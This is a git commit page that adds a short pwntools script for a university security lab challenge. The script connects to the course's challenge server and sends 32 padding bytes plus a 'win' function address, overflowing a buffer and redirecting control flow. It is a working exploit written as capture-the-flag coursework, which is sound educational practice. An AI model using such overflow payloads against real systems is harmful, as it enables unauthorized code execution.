Lab6
This commit is contained in:
12
pa/lab6/chall_calling_functions.py
Normal file
12
pa/lab6/chall_calling_functions.py
Normal file
@@ -0,0 +1,12 @@
|
||||
from pwn import *
|
||||
|
||||
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
||||
PORT = 25153
|
||||
|
||||
WIN_ADDR = 0x080486f1
|
||||
|
||||
conn = remote(HOST, PORT)
|
||||
|
||||
conn.recvuntil("?\n")
|
||||
conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
|
||||
conn.interactive()
|
||||
Reference in New Issue
Block a user